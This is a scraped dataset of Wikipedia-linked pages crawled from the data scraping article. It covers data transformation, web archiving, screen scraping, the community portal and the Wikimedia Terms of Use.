378 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Community_portal | This page provides a listing of current collaborations, tasks, and news about English Wikipedia. New to Wikipedia? See the contributing to Wikipedia page or our tutorial for everything you need to know to get started. For a listing of internal project pages of interest, see the department directory. For a listing of ongoing discussions and current requests, see the Dashboard. Welcome to the community bulletin board, which is a page used for announcements from WikiProjects and other groups. Included here are coordinated efforts, events, projects, and other general announcements. Yearly or infrequent events Monthly or continuous events Also consider posting WikiProject, Task Force, and Collaboration news at The Signpost's WikiProject Report page. Please include your signature when adding a listing here. Latest tech news from the Wikimedia technical community. Please tell other users about these changes. Not all changes will affect you. Translations are available. Feature news Project updates Tech news prepared by Tech News writers and posted by bot Contribute Translate Get help Give feedback Subscribe or unsubscribe. Discussions in the following areas have requested wider attention via Requests for comment: You can help improve the articles listed below This list updates frequently, so check back here for more tasks to try. (See Wikipedia:Maintenance or the Task Center for further information.) Help counter systemic bias by creating new articles on important women. Help improve popular pages, especially those of low quality. This week's article for improvement is: Social experiment Previous selections: Happiness List of public art in Chicago Cape (geography) This week's backlog of the week is: Category:Pages with reference errors What is an appropriate length for a Wikipedia article? This is discussed at Article length. An article can be as long as 10,000 words or more, if there are enough sources on the topic to provide for that much content. Undoubtedly there are articles that reach 20,000 words. The recommended maximum length is around 100kB of text. There is no standard for minimum length, an acceptable stub article could be as short as three or four sentences. If you look at the menu on the right-hand side of any page on Wikipedia, there is a link to Page information. Clicking on that link shows lots of information about the page including its total size as well as how often it has been viewed. There is also this tool - you just copy and paste the text into there, and it counts it for you. Kindness Campaign |
379 | https://en.wikipedia.org/wiki/Data_scraping | https://no.wikipedia.org/wiki/Skjermskraping | Skjermskraping, av engelsk screen scraping, vil si kopiere tekst og medieelementer fra eksterne kilder for ekstrahere nyttig informasjon. Vanligste form er skraping av nettsider. Skjermskraping benyttes ofte for koble ulike informasjon fra ulikenettsteder og skal b te p at nettstedene som kobles ikke har lagt ut informasjonen i strukturerte tekstformater som gj r kobling enkelt. |
380 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_transformation | In computing, data transformation is the process of converting data from one format or structure into another format or structure. It is a fundamental aspect of most data integration 1 and data management tasks such as data wrangling, data warehousing, data integration and application integration. Data transformation can be simple or complex based on the required changes to the data between the source (initial) data and the target (final) data. Data transformation is typically performed via a mixture of manual and automated steps. 2 Tools and technologies used for data transformation can vary widely based on the format, structure, complexity, and volume of the data being transformed. A master data recast is another form of data transformation where the entire database of data values is transformed or recast without extracting the data from the database. All data in a well designed database is directly or indirectly related to a limited set of master database tables by a network of foreign key constraints. Each foreign key constraint is dependent upon a unique database index from the parent database table. Therefore, when the proper master database table is recast with a different unique index, the directly and indirectly related data are also recast or restated. The directly and indirectly related data may also still be viewed in the original form since the original unique index still exists with the master data. Also, the database recast must be done in such a way as to not impact the applications architecture software. When the data mapping is indirect via a mediating data model, the process is also called data mediation. Data transformation can be divided into the following steps, each applicable as needed based on the complexity of the transformation required. These steps are often the focus of developers or technical data analysts who may use multiple specialized tools to perform their tasks. The steps can be described as follows: Data discovery is the first step in the data transformation process. Typically the data is profiled using profiling tools or sometimes using manually written profiling scripts to better understand the structure and characteristics of the data and decide how it needs to be transformed. Data mapping is the process of defining how individual fields are mapped, modified, joined, filtered, aggregated etc. to produce the final desired output. Developers or technical data analysts traditionally perform data mapping since they work in the specific technologies to define the transformation rules (e.g. visual ETL tools, 3 transformation languages). Code generation is the process of generating executable code (e.g. SQL, Python, R, or other executable instructions) that will transform the data based on the desired and defined data mapping rules. 4 Typically, the data transformation technologies generate this code 5 based on the definitions or metadata defined by the developers. Code execution is the step whereby the generated code is executed against the data to create the desired output. The executed code may be tightly integrated into the transformation tool, or it may require separate steps by the developer to manually execute the generated code. Data review is the final step in the process, which focuses on ensuring the output data meets the transformation requirements. It is typically the business user or final end-user of the data that performs this step. Any anomalies or errors in the data that are found and communicated back to the developer or data analyst as new requirements to be implemented in the transformation process. 1 Traditionally, data transformation has been a bulk or batch process, 6 whereby developers write code or implement transformation rules in a data integration tool, and then execute that code or those rules on large volumes of data. 7 This process can follow the linear set of steps as described in the data transformation process above. Batch data transformation is the cornerstone of virtually all data integration technologies such as data warehousing, data migration and application integration. 1 When data must be transformed and delivered with low latency, the term "microbatch" is often used. 6 This refers to small batches of data (e.g. a small number of rows or small set of data objects) that can be processed very quickly and delivered to the target system when needed. Traditional data transformation processes have served companies well for decades. The various tools and technologies (data profiling, data visualization, data cleansing, data integration etc.) have matured and most (if not all) enterprises transform enormous volumes of data that feed internal and external applications, data warehouses and other data stores. 8 This traditional process also has limitations that hamper its overall efficiency and effectiveness. 1 2 7 The people who need to use the data (e.g. business users) do not play a direct role in the data transformation process. 9 Typically, users hand over the data transformation task to developers who have the necessary coding or technical skills to define the transformations and execute them on the data. 8 This process leaves the bulk of the work of defining the required transformations to the developer, which often in turn do not have the same domain knowledge as the business user. The developer interprets the business user requirements and implements the related code logic. This has the potential of introducing errors into the process (through misinterpreted requirements), and also increases the time to arrive at a solution. 9 10 This problem has given rise to the need for agility and self-service in data integration (i.e. empowering the user of the data and enabling them to transform the data themselves interactively). 7 10 There are companies that provide self-service data transformation tools. They are aiming to efficiently analyze, map and transform large volumes of data without the technical knowledge and process complexity that currently exists. While these companies use traditional batch transformation, their tools enable more interactivity for users through visual platforms and easily repeated scripts. 11 Still, there might be some compatibility issues (e.g. new data sources like IoT may not work correctly with older tools) and compliance limitations due to the difference in data governance, preparation and audit practices. 12 Interactive data transformation (IDT) 13 is an emerging capability that allows business analysts and business users the ability to directly interact with large datasets through a visual interface, 9 understand the characteristics of the data (via automated data profiling or visualization), and change or correct the data through simple interactions such as clicking or selecting certain elements of the data. 2 Although interactive data transformation follows the same data integration process steps as batch data integration, the key difference is that the steps are not necessarily followed in a linear fashion and typically don't require significant technical skills for completion. 14 There are a number of companies that provide interactive data transformation tools, including Trifacta, Alteryx and Paxata. They are aiming to efficiently analyze, map and transform large volumes of data while at the same time abstracting away some of the technical complexity and processes which take place under the hood. Interactive data transformation solutions provide an integrated visual interface that combines the previously disparate steps of data analysis, data mapping and code generation execution and data inspection. 8 That is, if changes are made at one step (like for example renaming), the software automatically updates the preceding or following steps accordingly. Interfaces for interactive data transformation incorporate visualizations to show the user patterns and anomalies in the data so they can identify erroneous or outlying values. 9 Once they've finished transforming the data, the system can generate executable code logic, which can be executed or applied to subsequent similar data sets. By removing the developer from the process, interactive data transformation systems shorten the time needed to prepare and transform the data, eliminate costly errors in interpretation of user requirements and empower business users and analysts to control their data and interact with it as needed. 10 There are numerous languages available for performing data transformation. Many transformation languages require a grammar to be provided. In many cases, the grammar is structured using something closely resembling Backus Naur form (BNF). There are numerous languages available for such purposes varying in their accessibility (cost) and general usefulness. 15 Examples of such languages include: Additionally, companies such as Trifacta and Paxata have developed domain-specific transformational languages (DSL) for servicing and transforming datasets. The development of domain-specific languages has been linked to increased productivity and accessibility for non-technical users. 16 Trifacta's “Wrangle” is an example of such a domain specific language. 17 Another advantage of the recent domain-specific transformational languages trend is that a domain-specific transformational language can abstract the underlying execution of the logic defined in the domain-specific transformational language. They can also utilize that same logic in various processing engines, such as Spark, MapReduce, and Dataflow. In other words, with a domain-specific transformational language, the transformation language is not tied to the underlying engine. 17 Although transformational languages are typically best suited for transformation, something as simple as regular expressions can be used to achieve useful transformation. A text editor like vim, emacs or TextPad supports the use of regular expressions with arguments. This would allow all instances of a particular pattern to be replaced with another pattern using parts of the original pattern. For example: could both be transformed into a more compact form like: In other words, all instances of a function invocation of foo with three arguments, followed by a function invocation with two arguments would be replaced with a single function invocation using some or all of the original set of arguments. Another advantage to using regular expressions is that they will not fail the null transform test. That is, using your transformational language of choice, run a sample program through a transformation that doesn't perform any transformations. Many transformational languages will fail this test. |
381 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:RecentChangesLinked/Data_scraping | Enter a page name to see changes on pages linked to or from that page. (To see members of a category, enter Category:Name of category). Changes to pages on your Watchlist are shown in bold with a green bullet. See more at Help:Related changes. |
382 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_archiving | Web archiving is the process of collecting, preserving and providing access to material from World Wide Web. The aim is to ensure that information is preserved in an archival format for research and the public. 1 Web archivists typically employ automated web crawlers for capturing the massive amount of information on the Web. The most widely known web archive service is the Wayback Machine, run by Internet Archive. The growing portion of human culture created and recorded on the web makes it inevitable that more and more libraries and archives will have to face the challenges of web archiving. 2 National libraries, national archives and various consortia of organizations are also involved in archiving culturally important Web content. Commercial web archiving software and services are also available to organizations who need to archive their own web content for corporate heritage, regulatory, or legal purposes. While curation and organization of the web has been prevalent since the mid- to late 1990s, one of the first large-scale web archiving project was the Internet Archive, a non-profit organization created by Brewster Kahle in 1996. 3 The Internet Archive released its own search engine for viewing archived web content, the Wayback Machine, in 2001. 3 As of 2018, the Internet Archive was home to 40 petabytes of data. 4 The Internet Archive also developed many of its own tools for collecting and storing its data, including PetaBox for storing the large amounts of data efficiently and safely, and Heritrix, a web crawler developed in conjunction with the Nordic national libraries. 3 Other projects launched around the same time included a web archiving project by the National Library of Canada, Australia's Pandora, Tasmanian web archives and Sweden's Kulturarw3. 5 6 From 2001 to 2010, failed verification the International Web Archiving Workshop (IWAW) provided a platform to share experiences and exchange ideas. 7 8 The International Internet Preservation Consortium (IIPC), established in 2003, has facilitated international collaboration in developing standards and open source tools for the creation of web archives. 9 The now-defunct Internet Memory Foundation was founded in 2004 and founded by the European Commission in order to archive the web in Europe. 3 This project developed and released many open source tools, such as "rich media capturing, temporal coherence analysis, spam assessment, and terminology evolution detection. 3 The data from the foundation is now housed by the Internet Archive, but not currently publicly accessible. 10 Despite the fact that there is no centralized responsibility for its preservation, web content is rapidly becoming the official record. For example, in 2017, the United States Department of Justice affirmed that the government treats the President's tweets as official statements. 11 Web archivists generally archive various types of web content including HTML web pages, style sheets, JavaScript, images, and video. They also archive metadata about the collected resources such as access time, MIME type, and content length. This metadata is useful in establishing authenticity and provenance of the archived collection. Transactional archiving is an event-driven approach, which collects the actual transactions which take place between a web server and a web browser. It is primarily used as a means of preserving evidence of the content which was actually viewed on a particular website, on a given date. This may be particularly important for organizations which need to comply with legal or regulatory requirements for disclosing and retaining information. 12 A transactional archiving system typically operates by intercepting every HTTP request to, and response from, the web server, filtering each response to eliminate duplicate content, and permanently storing the responses as bitstreams. Web archives which rely on web crawling as their primary means of collecting the Web are influenced by the difficulties of web crawling: However, it is important to note that a native format web archive, i.e., a fully browsable web archive, with working links, media, etc., is only really possible using crawler technology. The Web is so large that crawling a significant portion of it takes a large number of technical resources. Also, the Web is changing so fast that portions of a website may suffer modifications before a crawler has even finished crawling it. Some web servers are configured to return different pages to web archiver requests than they would in response to regular browser requests. This is typically done to fool search engines into directing more user traffic to a website, and is often done to avoid accountability, or to provide enhanced content only to those browsers that can display it. Not only must web archivists deal with the technical challenges of web archiving, they must also contend with intellectual property laws. Peter Lyman 13 states that "although the Web is popularly regarded as a public domain resource, it is copyrighted; thus, archivists have no legal right to copy the Web". However national libraries in some countries 14 have a legal right to copy portions of the web under an extension of a legal deposit. Some private non-profit web archives that are made publicly accessible like WebCite, the Internet Archive or the Internet Memory Foundation allow content owners to hide or remove archived content that they do not want the public to have access to. Other web archives are only accessible from certain locations or have regulated usage. WebCite cites a recent lawsuit against Google's caching, which Google won. 15 In 2017 the Financial Industry Regulatory Authority, Inc. (FINRA), a United States financial regulatory organization, released a notice stating all the business doing digital communications are required to keep a record. This includes website data, social media posts, and messages. 16 Some copyright laws may inhibit Web archiving. For instance, academic archiving by Sci-Hub falls outside the bounds of contemporary copyright law. The site provides enduring access to academic works including those that do not have an open access license and thereby contributes to the archival of scientific research which may otherwise be lost. 17 18 |
383 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-10 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
384 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. You are free to: Under the following conditions: With the understanding that: If you need help or you want to report a violation of these Terms of Use you can: Our Terms of Use Imagine a world in which every single human being can freely share in the sum of all knowledge. That's our commitment. Our Vision Statement Welcome to Wikimedia The Wikimedia Foundation, Inc. ("we" or "us" or "Foundation"), is a non-profit charitable organization, headquartered in San Francisco, California, United States, whose mission is to empower and engage people around the world to collect and develop content under a free license or in the public domain, and to disseminate it effectively and globally, free of charge. To support our vibrant community, we provide the essential infrastructure and organizational framework for the development of multilingual wiki projects and their editions (as explained on our Wikimedia Projects page) (hereby referred to as "Projects") and other endeavors which serve this mission. We strive to make and keep educational and informational content from the Projects available on the internet free of charge, in perpetuity. We welcome you ("you" or the "user") as a reader, or contributor of the Projects, and we encourage you to join the Wikimedia community. Before you participate, however, we ask that you please read and agree to the following Terms of Use ("Terms of Use"). These Terms of Use tell you about our public services at the Wikimedia Foundation, our relationship to you as a user, and the rights and responsibilities that guide us both. We host an incredible quantity of educational and informational content, all of which is contributed and made possible by users like yourself. Generally we do not contribute, monitor, or delete content (with rare exceptions, such as under policies like these Terms of Use, for legal compliance, or when faced with urgent threats of serious harm). This means that editorial control is in the hands of you and your fellow users who create and manage the content. The community the network of users who are constantly building and using the Projects and or their websites (hereby referred to as "Project Websites") is the principal means through which the goals of the mission are achieved. The community contributes to and helps govern our Projects and Project Websites. The community also undertakes the critical function of creating and enforcing policies for the specific Project editions (such as the different language editions for the Wikipedia Project or the Wikimedia Commons multilingual edition). You, the user, are welcome to join as a contributor, editor, or author, but you should follow the policies that govern each of the independent Project editions, including the Universal Code of Conduct (UCoC), which apply to all Project editions. The largest of our Projects is Wikipedia, but we host other Projects too, each with different objectives and work methods. Each Project edition has a team of contributors, editors or authors who work together to create and manage the content on that Project edition. You are welcome to join these teams and work with them to improve these Projects. Since we are dedicated to making content freely accessible to the public, content you contribute is made available under a free license or released in the public domain. Please be aware that you are legally responsible for all of your contributions, edits, and reuse of Wikimedia content under the laws of the United States of America and other applicable laws (which may include laws where you or the subject of your contributions are located). This means it is important that you exercise caution when posting, modifying or reusing content. In light of this responsibility, we have some rules about what you cannot do, most of which are either for your own protection or for the protection of other users like yourself. Please keep in mind that the content we host is for general informational purposes only, so if you need expert advice for a particular question (such as medical, legal, or financial issues), you should seek the help of an appropriate professional. We also include other important notices and disclaimers, so please read these Terms of Use in their entirety. For clarity, other organizations, such as local Wikimedia chapters and associations, that may share in the same mission are nevertheless legally independent and separate from the Wikimedia Foundation. Unless otherwise stated by the Foundation as an authorized party on a given Project's Website, those other organizations have no responsibility for the operations of the Project's Website or its content. The Wikimedia Foundation is dedicated to encouraging the growth, development, and distribution of free multilingual content, and to hosting the full content of these wiki-based Projects for the public free of charge. Our role is to host some of the largest collaboratively edited reference Projects in the world, which can be found here. However, we act only as a hosting service provider, maintaining the infrastructure and organizational framework. This infrastructure and framework allow our users to build the Projects by contributing and editing content themselves. They also allow our users to reuse that content. The infrastructure we maintain includes specialized technological infrastructure that enables users to programmatically interact with and reuse content on Projects (referred to as "Application Programming Interface" or "APIs"), and mobile applications. As used throughout the rest of the Terms of Use, our services consist of: The Project Websites we host, technological infrastructure that we maintain, and any technical spaces that we host for the maintenance and improvement of our Projects. Because of our unique role, there are a couple of things you should be aware of when considering our relationship to you, the Projects, and other users: We ask that you review the terms of our Privacy Policy, so that you are aware of how we collect and use your information. The Projects hosted by the Wikimedia Foundation only exist because of the vibrant community of users like you who collaborate to write, edit, and curate the content. We happily welcome your participation in this community. We encourage you to be civil and polite in your interactions with others in the community, to act in good faith, and to make edits and contributions aimed at furthering the mission of the shared Project. We ask that all users review and follow the Universal Code of Conduct ("UCoC"), which lays out requirements for collegial, civil collaboration across all Projects that we host. Certain activities, whether legal or illegal under the applicable law, may be harmful to other users and violate our rules, and some activities may also subject you to liability. Therefore, for your own protection and for that of other users, you may not engage in such activities on, or otherwise using, our Projects. These activities include: We reserve the right to exercise our enforcement discretion with respect to the provisions in section 4 of these Terms of Use. Where required, enforcement of these terms may include actions not listed in the Wikimedia Foundation Office Action Policy. If enforcement is required in new circumstances, we will make an effort within at most one (1) year to update the Office Action Policy to catalog the new type of action. Marketing Company Mediations Undisclosed editing by users receiving compensation creates an unreasonable burden on volunteer editors who investigate and enforce community policies. Therefore, for violations of this section related to undisclosed paid editing, you agree to submit to binding "Med-Arb" (a "Marketing Company Mediation") as described in section 14 of these Terms of Use. You are responsible for safeguarding your own password and other security credentials, and should never disclose them to any third party. Although you have considerable freedoms for reuse of the content on the Project Websites, it is important that, at the Wikimedia Foundation, we protect our trademark rights so that we can protect our users from fraudulent impersonators. Because of this, we ask that you please respect our trademarks. All Wikimedia Foundation trademarks belong to the Wikimedia Foundation, and any use of our trade names, trademarks, service marks, logos, or domain names must be in compliance with these Terms of Use and in compliance with our Trademark Policy. To grow the commons of free knowledge and free culture, all users contributing to the Projects or Project Websites are required to grant broad permissions to the general public to redistribute and reuse their contributions freely, so long as that use is properly attributed and the same freedom to reuse and redistribute is granted to any derivative works. In keeping with our goal of providing free information to the widest possible audience, we require that when necessary all submitted content be licensed so that it is freely reusable by anyone who may access it. You agree to the following licensing requirements: If the text content was imported from another source, it is possible that the content is licensed under a compatible CC BY-SA license but not GFDL (as described in "Importing text, above). In that case, you agree to comply with the compatible CC BY-SA license and do not have the option to relicense it under GFDL. To determine the license that applies to the content that you seek to reuse or redistribute, you should review the page footer, page history, and discussion page. In addition, please be aware that text that originated from external sources and was imported into a Project may be under a license that attaches additional attribution requirements. Users agree to indicate these additional attribution requirements clearly. Depending on the Project, such requirements may appear, for example, in a banner or other notations pointing out that some or all of the content was originally published elsewhere. Where there are such visible notations, reusers should preserve them. The Wikimedia Foundation wants to ensure that the content that we host can be reused by other users without fear of liability and that it is not infringing the proprietary rights of others. In fairness to our users, as well as to other creators and copyright holders, our policy is to respond to notices of alleged infringement that comply with the formalities of the Digital Millennium Copyright Act ("DMCA"). Pursuant to the DMCA, we will terminate, in appropriate circumstances, users and account holders of our system and network who are repeat infringers on our Projects and services. However, we also recognize that not every takedown notice is valid or in good faith. In such cases, we strongly encourage users to file counter-notifications when they appropriately believe a DMCA takedown demand is invalid or improper. For more information on what to do if you think a DMCA notice has been improperly filed, you may wish to consult the Lumen Database website. If you are the owner of content that is being improperly used on one of the Projects without your permission, you may request that the content be removed by filing a notice under the DMCA. To make such a request, please email us at legalwikimediaorg or snail mail our designated agent. Alternatively, you may make a request to our community, which often handles copyright issues faster and more effectively than the process prescribed under the DMCA. In that case, you can post a notice explaining your copyright concerns. For a non-exhaustive and non-authoritative list of the relevant processes for the different Project editions, visit the Copyright Problems page. Before filing a DMCA claim, you also have the option of sending an email to the community at infowikimediaorg. You are solely responsible for your use of any third-party websites or resources. Although the Projects and Project Websites contain links to third-party websites and resources, we do not endorse and are not responsible or liable for their availability, accuracy, or the related content, products, or services (including, without limitation, any viruses or other disabling features), nor do we have any obligation to monitor such third-party content. The community has the primary role in creating and enforcing policies applying to the different Project editions. At the Wikimedia Foundation, we rarely intervene in community decisions about policy and its enforcement. It is possible to notify us of illegal content, or content that violates our Terms of Use (including all policies and other documents incorporated by reference) for other reasons by contacting us directly. However, you can typically make a request directly to the Project's community: this may be more efficient, and is more consistent with our Projects' aim to empower the user community. Each Project will usually provide "Help" or "Contact" pages for further guidance, or specific tools for reporting issues. Alternatively if in doubt you can ask members of the community for help, by sending an email to infowikimediaorg or a more language-specific address from the Volunteer Response Team page. Please note that these mailboxes are monitored by users of the Projects, not the Foundation. As a result, they should not be threatened or issued with legal demands. If you contact the Foundation with a problem, we will typically explore whether and how existing community-led mechanisms can investigate and, where appropriate, resolve it. In an unusual case, the need may arise, or the community may ask us, to address an especially problematic user or especially problematic content because of significant Project disturbance or dangerous behavior. In such cases, we reserve the right, at our sole discretion (or where legally compelled), to: Those Foundation moderation activities may be informed or performed by software (such as traffic flood ("Denial of Service") protection). In those cases human review is normally available, upon request. In the interests of our users and the Projects, in the extreme circumstance that any individual has had their account or access blocked under this section, they are prohibited from creating or using another account on or seeking access to the same Project, unless we provide explicit permission. Without limiting the authority of the community, the Foundation itself will not ban a user from editing or contributing or block a user's account or access solely because of good faith criticism that does not result in actions otherwise violating these Terms of Use or community policies. The Wikimedia community and its members may also take action when so allowed by the community or Foundation policies applicable to the specific Project edition, including but not limited to warning, investigating, blocking, or banning users who violate those policies. You agree to comply with the final decisions of dispute resolution bodies that are established by the community for the specific Project editions (such as arbitration committees); these decisions may include sanctions as set out by the policy of the specific Project edition. Especially problematic users who have had accounts or access blocked on multiple Project editions may be subject to a ban from all of the Project editions, in accordance with the Global Ban Policy. In contrast to Board resolutions or these Terms of Use, policies established by the community, which may cover a single Project edition or multiple Projects editions (like the Global Ban Policy), may be modified by the relevant community according to its own procedures. The blocking of an account or access or the banning of a user under this provision shall be in accordance with Section 13 of these Terms of Use. If you believe we have not satisfactorily acted on a problematic content report, or if you have been subjected to a Foundation moderation action that you wish to challenge, you may be able to submit an appeal. Other information about routes of appeal may also be explained to you at the time, or in Project-specific help pages. We reserve the right to suspend (temporarily, or permanently) our handling of reports or other correspondence from users or third parties, whether about allegedly illegal or otherwise problematic content or conduct, or requesting appeals against moderation actions, if such correspondence was made in bad faith, repetitive, unfounded, and or abusive. In appropriate circumstances, your email address may even be blocked on our email system(s), and you will then need to contact us at our postal address if you wish to further correspond with us during that block. For less serious cases (e.g. up to three polite emails about one or more meritless complaints), this is likely to be temporary. More frequent or more abusive communications are more likely to lead to permanent measures. The Wikimedia Foundation Board of Trustees releases official policies from time to time. Some of these policies may be mandatory for a particular Project or Project edition, and, when they are, you agree to abide by them as applicable. We make available a set of APIs, which include documentation and associated tools, to enable users to build products that promote free knowledge. By using our APIs, you agree to abide by all applicable policies governing the use of the APIs, which include but are not limited to the User-Agent Policy, the Robot Policy, and the API:Etiquette (collectively, "API Documentation"), which are incorporated into these Terms of Use by reference. Though we hope you will stay and continue to contribute to the Projects, you can stop using our services any time. In certain (hopefully unlikely) circumstances it may be necessary for either ourselves or the Wikimedia community or its members (as described in Section 10) to terminate part or all of our services, terminate these Terms of Use, block your account or access, or ban you as a user. If your account or access is blocked or otherwise terminated for any reason, your public contributions and a record of your activities on or in relation to the Projects (including any correspondence you have sent us) will be unaffected (subject to applicable policies), and you may still access our public pages for the sole purpose of reading publicly available content on the Projects. In such circumstances, however, you may not be able to access your account or settings. However, regardless of any other provision in these Terms of Use, we reserve the right to suspend or end the services at any time, with or without cause, and with or without notice. Even after your use and participation are banned, blocked or otherwise suspended, these Terms of Use will remain in effect with respect to relevant provisions, including Sections 1, 3, 4, 6, 7, 9 16, and 18. We hope that no serious disagreements arise involving you, but, in the event there is a dispute, we encourage you to seek resolution through the dispute resolution procedures or mechanisms provided by the Projects or Project editions and the Wikimedia Foundation. If you seek to file a legal claim against us, you agree to file and resolve it exclusively in a state or federal court located in San Francisco County, California. You also agree that the laws of the State of California and, to the extent applicable, the laws of the United States of America will govern these Terms of Use, as well as any legal claim that might arise between you and us (without reference to conflict of laws principles). You agree to submit to the personal jurisdiction of, and agree that venue is proper in, the courts located in San Francisco County, California, in any legal action or proceeding relating to us or these Terms of Use. To ensure that disputes are dealt with soon after they arise, you agree that regardless of any statute or law to the contrary, any claim or cause of action you might have arising out of or related to use of our services or these Terms of Use must be filed within the applicable statute of limitations or, if earlier, one (1) year after the pertinent facts underlying such claim or cause of action could have been discovered with reasonable diligence (or be forever barred). Marketing Company Mediations As described in section 4 of these Terms of Use, you agree to resolve violations of the Paid Contributions without Disclosure in a Marketing Company Mediation at the Foundation's discretion. Marketing Company Mediations are binding mediations where, at the end of either a half or full day session, any disputed items that remain unresolved will be decided by the mediator in a legally binding decision. They will be conducted in meetings by teleconference or videoconference. If an in-person meeting is required, then the Marketing Company Mediation will take place in San Francisco County, California. The parties will split all fees and expenses related to the mediation arbitration equally. You agree, as part of a Marketing Company Mediation, to cooperate with the Foundation, including by timely providing any documentation in your possession relating to your undisclosed paid editing activities including the accounts used, articles affected, and clients who purchased such services. Marketing Company Mediations are subject to and governed by the Federal Arbitration Act to the extent that the mediator becomes an arbitrator. The prevailing party shall be entitled to recover its attorneys' fees (including all fees necessary to determine the applicability of the Marketing Company Mediation and to enforce the binding result) and all costs relating to the investigation and enforcement of its rights. A party may be deemed "prevailing" even if it is not successful on every claim asserted. If for some reason the entirety of these Marketing Company Mediation requirements are found to be unenforceable, you agree to resolve any disputes as described in the beginning of this section. Highlighted for emphasis At the Wikimedia Foundation, we do our best to provide educational and informational content to a very wide audience, but your use of our services is at your sole risk. We provide these services on an "as is" and "as available" basis, and we expressly disclaim all express or implied warranties of all kinds, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, and non-infringement. We make no warranty that our services will meet your requirements, be safe, secure, uninterrupted, timely, accurate, or error-free, or that your information will be secure. We are not responsible for the content, 